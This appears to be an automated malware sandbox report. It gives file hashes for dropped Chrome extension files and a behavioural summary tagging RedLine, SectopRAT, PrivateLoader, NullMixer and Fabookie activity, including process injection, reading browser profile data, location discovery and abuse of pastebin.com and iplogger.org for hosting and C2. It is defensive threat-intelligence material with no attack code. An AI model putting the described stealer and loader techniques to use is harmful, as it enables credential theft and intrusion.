| SHA256 | 243befbd6b67a21433dcc97dc1a728896d3a070dc20055eb04d644e1bb955fe7 |
| SHA512 | cd344d060e30242e5a4705547e807ce3ce2231ee983bb9a8ad22b3e7598a7ec87399094b04a80245ad51d039370f09d74fe54c0b0738583884a73f0c7e888ad8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ne\messages.json
| MD5 | 065eb4de2319a4094f7c1c381ac753a0 |
| SHA1 | 6324108a1ad968cb3aec83316c6f12d51456c464 |
| SHA256 | 160e1cd593c901c7291ea4ecba735191d793ddfd7e9646a0560498627f61da6f |
| SHA512 | 8b3e970a2beb8b6b193ad6ab9baa0fd8e1147cb5b9e64d76a6d3f104d636481621be52c2d72c588adf444e136a9b1350ac767255d2e680df44e9a1fb75e4c898 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\nl\messages.json
| MD5 | 32df72f14be59a9bc9777113a8b21de6 |
| SHA1 | 2a8d9b9a998453144307dd0b700a76e783062ad0 |
| SHA256 | f3fe1ffcb182183b76e1b46c4463168c746a38e461fd25ca91ff2a40846f1d61 |
| SHA512 | e0966f5cca5a8a6d91c58d716e662e892d1c3441daa5d632e5e843839bb989f620d8ac33ed3edbafe18d7306b40cd0c4639e5a4e04da2c598331dacec2112aad |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\no\messages.json
| MD5 | a1744b0f53ccf889955b95108367f9c8 |
| SHA1 | 6a5a6771dff13dcb4fd425ed839ba100b7123de0 |
| SHA256 | 21ceff02b45a4bfd60d144879dfa9f427949a027dd49a3eb0e9e345bd0b7c9a8 |
| SHA512 | f55e43f14514eecb89f6727a0d3c234149609020a516b193542b5964d2536d192f40cc12d377e70c683c269a1bdcde1c6a0e634aa84a164775cffe776536a961 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\pa\messages.json
| MD5 | 97f769f51b83d35c260d1f8cfd7990af |
| SHA1 | 0d59a76564b0aee31d0a074305905472f740ceca |
| SHA256 | bbd37d41b7de6f93948fa2437a7699d4c30a3c39e736179702f212cb36a3133c |
| SHA512 | d91f5e2d22fc2d7f73c1f1c4af79db98fcfd1c7804069ae9b2348cbc729a6d2dff7fb6f44d152b0bdaba6e0d05dff54987e8472c081c4d39315cec2cbc593816 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\pl\messages.json
| MD5 | b8d55e4e3b9619784aeca61ba15c9c0f |
| SHA1 | b4a9c9885fbeb78635957296fddd12579fefa033 |
| SHA256 | e00ff20437599a5c184ca0c79546cb6500171a95e5f24b9b5535e89a89d3ec3d |
| SHA512 | 266589116eee223056391c65808255edae10eb6dc5c26655d96f8178a41e283b06360ab8e08ac3857d172023c4f616ef073d0bea770a3b3dd3ee74f5ffb2296b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\pt_BR\messages.json
| MD5 | 608551f7026e6ba8c0cf85d9ac11f8e3 |
| SHA1 | 87b017b2d4da17e322af6384f82b57b807628617 |
| SHA256 | a73eea087164620fa2260d3910d3fbe302ed85f454edb1493a4f287d42fc882f |
| SHA512 | 82f52f8591db3c0469cc16d7cbfdbf9116f6d5b5d2ad02a3d8fa39ce1378c64c0ea80ab8509519027f71a89eb8bbf38a8702d9ad26c8e6e0f499bf7da18bf747 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\pt_PT\messages.json
| MD5 | 0963f2f3641a62a78b02825f6fa3941c |
| SHA1 | 7e6972beab3d18e49857079a24fb9336bc4d2d48 |
| SHA256 | e93b8e7fb86d2f7dfae57416bb1fb6ee0eea25629b972a5922940f0023c85f90 |
| SHA512 | 22dd42d967124da5a2209dd05fb6ad3f5d0d2687ea956a22ba1e31c56ec09deb53f0711cd5b24d672405358502e9d1c502659bb36ced66caf83923b021ca0286 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ro\messages.json
| MD5 | bed8332ab788098d276b448ec2b33351 |
| SHA1 | 6084124a2b32f386967da980cbe79dd86742859e |
| SHA256 | 085787999d78fadff9600c9dc5e3ff4fb4eb9be06d6bb19df2eef8c284be7b20 |
| SHA512 | 22596584d10707cc1c8179ed3abe46ef2c314cf9c3d0685921475944b8855aab660590f8fa1cfdce7976b4bb3bd9abbbf053f61f1249a325fd0094e1c95692ed |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ru\messages.json
| MD5 | 51d34fe303d0c90ee409a2397fca437d |
| SHA1 | b4b9a7b19c62d0aa95d1f10640a5fba628ccca12 |
| SHA256 | be733625acd03158103d62bc0eef272ca3f265ac30c87a6a03467481a177dae3 |
| SHA512 | e8670ded44dc6ee30e5f41c8b2040cf8a463cd9a60fc31fa70eb1d4c9ac1a3558369792b5b86fa761a21f5266d5a35e5c2c39297f367daa84159585c19ec492a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\si\messages.json
| MD5 | b8a4fd612534a171a9a03c1984bb4bdd |
| SHA1 | f513f7300827fe352e8ecb5bd4bb1729f3a0e22a |
| SHA256 | 54241ebe651a8344235cc47afd274c080abaebc8c3a25afb95d8373b6a5670a2 |
| SHA512 | c03e35bfde546aeb3245024ef721e7e606327581efe9eaf8c5b11989d9033bdb58437041a5cb6d567baa05466b6aaf054c47f976fd940eeedf69fdf80d79095b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\sk\messages.json
| MD5 | 8e55817bf7a87052f11fe554a61c52d5 |
| SHA1 | 9abdc0725fe27967f6f6be0df5d6c46e2957f455 |
| SHA256 | 903060ec9e76040b46deb47bbb041d0b28a6816cb9b892d7342fc7dc6782f87c |
| SHA512 | eff9ec7e72b272dde5f29123653bc056a4bc2c3c662ae3c448f8cb6a4d1865a0679b7e74c1b3189f3e262109ed6bc8f8d2bde14aefc8e87e0f785ae4837d01c7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\sl\messages.json
| MD5 | bfaefeff32813df91c56b71b79ec2af4 |
| SHA1 | f8eda2b632610972b581724d6b2f9782ac37377b |
| SHA256 | aab9cf9098294a46dc0f2fa468afff7ca7c323a1a0efa70c9db1e3a4da05d1d4 |
| SHA512 | 971f2bbf5e9c84de3d31e5f2a4d1a00d891a2504f8af6d3f75fc19056bfd059a270c4c9836af35258aba586a1888133fb22b484f260c1cbc2d1d17bc3b4451aa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\sr\messages.json
| MD5 | 7f5f8933d2d078618496c67526a2b066 |
| SHA1 | b7050e3efa4d39548577cf47cb119fa0e246b7a4 |
| SHA256 | 4e8b69e864f57cddd4dc4e4faf2c28d496874d06016bc22e8d39e0cb69552769 |
| SHA512 | 0fbab56629368eef87deef2977ca51831beb7deae98e02504e564218425c751853c4fdeaa40f51ecfe75c633128b56ae105a6eb308fd5b4a2e983013197f5dba |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\sv\messages.json
| MD5 | 90d8fb448ce9c0b9ba3d07fb8de6d7ee |
| SHA1 | d8688cac0245fd7b886d0deb51394f5df8ae7e84 |
| SHA256 | 64b1e422b346ab77c5d1c77142685b3ff7661d498767d104b0c24cb36d0eb859 |
| SHA512 | 6d58f49ee3ef0d3186ea036b868b2203fe936ce30dc8e246c32e90b58d9b18c624825419346b62af8f7d61767dbe9721957280aa3c524d3a5dfb1a3a76c00742 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\sw\messages.json
| MD5 | d0579209686889e079d87c23817eddd5 |
| SHA1 | c4f99e66a5891973315d7f2bc9c1daa524cb30dc |
| SHA256 | 0d20680b74af10ef8c754fcde259124a438dce3848305b0caf994d98e787d263 |
| SHA512 | d59911f91ed6c8ff78fd158389b4d326daf4c031b940c399569fe210f6985e23897e7f404b7014fc7b0acec086c01cc5f76354f7e5d3a1e0dedef788c23c2978 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ta\messages.json
| MD5 | dcc0d1725aeaeaaf1690ef8053529601 |
| SHA1 | bb9d31859469760ac93e84b70b57909dcc02ea65 |
| SHA256 | 6282bf9df12ad453858b0b531c8999d5fd6251eb855234546a1b30858462231a |
| SHA512 | 6243982d764026d342b3c47c706d822bb2b0caffa51f0591d8c878f981eef2a7fc68b76d012630b1c1eb394af90eb782e2b49329eb6538dd5608a7f0791fdcf5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\te\messages.json
| MD5 | 385e65ef723f1c4018eee6e4e56bc03f |
| SHA1 | 0cea195638a403fd99baef88a360bd746c21df42 |
| SHA256 | 026c164bae27dbb36a564888a796aa3f188aad9e0c37176d48910395cf772cea |
| SHA512 | e55167cb5638e04df3543d57c8027b86b9483bfcafa8e7c148eded66454aebf554b4c1cf3c33e93ec63d73e43800d6a6e7b9b1a1b0798b6bdb2f699d3989b052 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\th\messages.json
| MD5 | 64077e3d186e585a8bea86ff415aa19d |
| SHA1 | 73a861ac810dabb4ce63ad052e6e1834f8ca0e65 |
| SHA256 | d147631b2334a25b8aa4519e4a30fb3a1a85b6a0396bc688c68dc124ec387d58 |
| SHA512 | 56dd389eb9dd335a6214e206b3bf5d63562584394d1de1928b67d369e548477004146e6cb2ad19d291cb06564676e2b2ac078162356f6bc9278b04d29825ef0c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\tr\messages.json
| MD5 | 76b59aaacc7b469792694cf3855d3f4c |
| SHA1 | 7c04a2c1c808fa57057a4cceee66855251a3c231 |
| SHA256 | b9066a162bee00fd50dc48c71b32b69dffa362a01f84b45698b017a624f46824 |
| SHA512 | 2e507ca6874de8028dc769f3d9dfd9e5494c268432ba41b51568d56f7426f8a5f2e5b111ddd04259eb8d9a036bb4e3333863a8fc65aab793bcef39edfe41403b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\uk\messages.json
| MD5 | 970963c25c2cef16bb6f60952e103105 |
| SHA1 | bbddacfeee60e22fb1c130e1ee8efda75ea600aa |
| SHA256 | 9fa26ff09f6acde2457ed366c0c4124b6cac1435d0c4fd8a870a0c090417da19 |
| SHA512 | 1bed9fe4d4adeed3d0bc8258d9f2fd72c6a177c713c3b03fc6f5452b6d6c2cb2236c54ea972ece7dbfd756733805eb2352cae44bab93aa8ea73bb80460349504 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\ur\messages.json
| MD5 | 8b4df6a9281333341c939c244ddb7648 |
| SHA1 | 382c80cad29bcf8aaf52d9a24ca5a6ecf1941c6b |
| SHA256 | 5da836224d0f3a96f1c5eb5063061aad837ca9fc6fed15d19c66da25cf56f8ac |
| SHA512 | fa1c015d4ea349f73468c78fdb798d462eef0f73c1a762298798e19f825e968383b0a133e0a2ce3b3df95f24c71992235bfc872c69dc98166b44d3183bf8a9e5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\vi\messages.json
| MD5 | 773a3b9e708d052d6cbaa6d55c8a5438 |
| SHA1 | 5617235844595d5c73961a2c0a4ac66d8ea5f90f |
| SHA256 | 597c5f32bc999746bc5c2ed1e5115c523b7eb1d33f81b042203e1c1df4bbcafe |
| SHA512 | e5f906729e38b23f64d7f146fa48f3abf6baed9aafc0e5f6fa59f369dc47829dbb4bfa94448580bd61a34e844241f590b8d7aec7091861105d8ebb2590a3bee9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\zh_CN\messages.json
| MD5 | 3e76788e17e62fb49fb5ed5f4e7a3dce |
| SHA1 | 6904ffa0d13d45496f126e58c886c35366efcc11 |
| SHA256 | e72d0bb08cc3005556e95a498bd737e7783bb0e56dcc202e7d27a536616f5ee0 |
| SHA512 | f431e570ab5973c54275c9eef05e49e6fe2d6c17000f98d672dd31f9a1fad98e0d50b5b0b9cf85d5bbd3b655b93fd69768c194c8c1688cb962aa75ff1af9bdb6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\zh_HK\messages.json
| MD5 | 524e1b2a370d0e71342d05dde3d3e774 |
| SHA1 | 60d1f59714f9e8f90ef34138d33fbff6dd39e85a |
| SHA256 | 30f44cfad052d73d86d12fa20cfc111563a3b2e4523b43f7d66d934ba8dace91 |
| SHA512 | d2225cf2fa94b01a7b0f70a933e1fdcf69cdf92f76c424ce4f9fcc86510c481c9a87a7b71f907c836cbb1ca41a8bebbd08f68dbc90710984ca738d293f905272 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_locales\zh_TW\messages.json
| MD5 | 0e60627acfd18f44d4df469d8dce6d30 |
| SHA1 | 2bfcb0c3ca6b50d69ad5745fa692baf0708db4b5 |
| SHA256 | f94c6ddedf067642a1af18d629778ec65e02b6097a8532b7e794502747aeb008 |
| SHA512 | 6ff517eed4381a61075ac7c8e80c73fafae7c0583ba4fa7f4951dd7dbe183c253702dee44b3276efc566f295dac1592271be5e0ac0c7d2c9f6062054418c7c27 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\_metadata\verified_contents.json
| MD5 | f897300492e3ab467e56883d23d02d77 |
| SHA1 | decd6dc9e70eccf9b45983147680614c019b99ea |
| SHA256 | f9b3a5747dedcb5aed58fcfc0f4fd3bd2f2e903f2ccef90a92a73dbc0f8c3dbd |
| SHA512 | b8ac574e24814baf04a264e7f3f00b4285cd7b66104dfc77897440a898fca5230775300ec7def723678975a04c2cd1bc73a44f77da26262e8704029930990c62 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\service_worker_bin_prod.js
| MD5 | 4e0c47897bf98deac56f800942e150c4 |
| SHA1 | 7903d30e0acee273724bdaa67446d9fd4e8460a5 |
| SHA256 | fe76ea0c2f81e6140f38f4143b40be85014b93ff80737600cfb39aeb5c8c6537 |
| SHA512 | 8b31463fc683439bab5d4aefe2be0f6a9f5b695c2d95aff3f842bfc74b10ae3d386d288121161506f74a08fb86d25c1096da4177b768254bf84e83983982640f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\page_embed_script.js
| MD5 | 3ab0cd0f493b1b185b42ad38ae2dd572 |
| SHA1 | 079b79c2ed6f67b5a5bd9bc8c85801f96b1b0f4b |
| SHA256 | 73e3888ccbc8e0425c3d2f8d1e6a7211f7910800eede7b1e23ad43d3b21173f7 |
| SHA512 | 32f9db54654f29f39d49f7a24a1fc800dbc0d4a8a1bab2369c6f9799bc6ade54962eff6010ef6d6419ae51d5b53ec4b26b6e2cdd98def7cc0d2adc3a865f37d3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\offscreendocument_main.js
| MD5 | 9d0ef4f7cb0306dcb7a7cdcd6dc2ccc7 |
| SHA1 | 88d7f0a88c5807bfe00f13b612cc0522eebe514a |
| SHA256 | e5e4392b21a21ecafd27707bf70f95961b2656735a20b40ba54479d40eab063c |
| SHA512 | 34cd9af9199de606a531e98db82beaa5552e59bccb2ab2bf49f82d6fa05425eb6936bc5f03bfc421ab6980b91395d9fdc5f0776882e1d49b3217cd35641ff906 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\offscreendocument.html
| MD5 | b747b5922a0bc74bbf0a9bc59df7685f |
| SHA1 | 7bf124b0be8ee2cfcd2506c1c6ffc74d1650108c |
| SHA256 | b9fa2d52a4ffabb438b56184131b893b04655b01f336066415d4fe839efe64e7 |
| SHA512 | 7567761be4054fcb31885e16d119cd4e419a423ffb83c3b3ed80bfbf64e78a73c2e97aae4e24ab25486cd1e43877842db0836db58fbfbcef495bc53f9b2a20ec |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp\scoped_dir4020_637586501\CRX_INSTALL\128.png
| MD5 | 35696aba596d5b8619a558dd05b4ad40 |
| SHA1 | 7ecc1dad332847b08c889cb35dda9d4bae85dea8 |
| SHA256 | 75da533888189d13fc340d40637b9fc07a3f732e3fcf33ec300f4c7268790a62 |
| SHA512 | c32f20865f736b772844aaa44572369e7ae85b9f2f17f87d61694acc54487309a32bc4830ed8d9cee8b593babecf728c1ea33c2b9588649be0e4f1e6ed7ee753 |
memory/4600-1466-0x0000000002FE0000-0x0000000003072000-memory.dmp
memory/4600-1468-0x0000000003C80000-0x0000000003D0B000-memory.dmp
memory/4600-1467-0x0000000003080000-0x0000000003C7B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | dbb82e68eeac2e88c0ac1ff642efa422 |
| SHA1 | 908106c09b6bf4f4e09d222482721ddb59716355 |
| SHA256 | d95429bf2f39fb59de22b2880df936e8f78b73114e1433dd0a78f4e16e0d01fb |
| SHA512 | 3f4dc10985f90bfdca4c75076f9264436111c1ca124fbb208b80b2e66d8b17d0f343e77ee8bed738e768fc8ee4e81693c9611ba34287eabd49be6cde06eb5c65 |
memory/4600-1488-0x0000000003D20000-0x0000000003DA7000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | f5c377de6e861a66797927c073ec3b28 |
| SHA1 | 3e252007a19b6af8343dae2c475848d7a12fa030 |
| SHA256 | 7bc1bd121650caf938679c0b19f79454180e55dbe3f38fc15809d0e4439ff8b1 |
| SHA512 | fea38faad677d290075cd641c12cc73f2aa138fac2152052c0026c52f452f92e5fef2e1ab2122f8f8031dc5f7c25cfc2dd94abcb70d1f4b904dafddf42dd0f1f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
| MD5 | 2213da253ef261f32b9ddea80d893644 |
| SHA1 | 1d75ee795fcd6df4d644b64dab4f4f272de64995 |
| SHA256 | ddcb0ce2a46443789660d6cb7e3b43609c3c3e6c2df837258d15439f64ce2619 |
| SHA512 | 7b1d405e19d139a80dc84a2b3232ce872cc2e9bd912305ac7323150b7e85439d3e8fe1d0ede506eed5186058604389fb688e927cda0de94fb5553e31f6e1f0dd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\248ebf1d-91d8-4134-a61a-3572021266c4.dmp
| MD5 | eda928f17c575fc9d695a53d059ea071 |
| SHA1 | 920d7bb0e269b283fc58170f0d553bb0bfc9abd2 |
| SHA256 | 1fc0f33c5c96119cef47ea56e24eec4b36e571750e3cc7233fa6658f90c732ac |
| SHA512 | f7176286b06c4316910a715111e2991f40276a57cd0afcf0890427cd2bfc0bab81f9553a6d7facd85edd925f579dd0935d3ddbca7f5749a7172f2f09ccb48dbd |
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
79s
Max time network
153s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062272ee8a02b1746.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-OR7RH.tmp\Wed067fa7edd4b875a.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4060 set thread context of 1360 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe |
| PID 5068 set thread context of 864 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06dffacb42ccf1c.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067ba5199af5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068a6c101a0e81.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed067fa7edd4b875a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
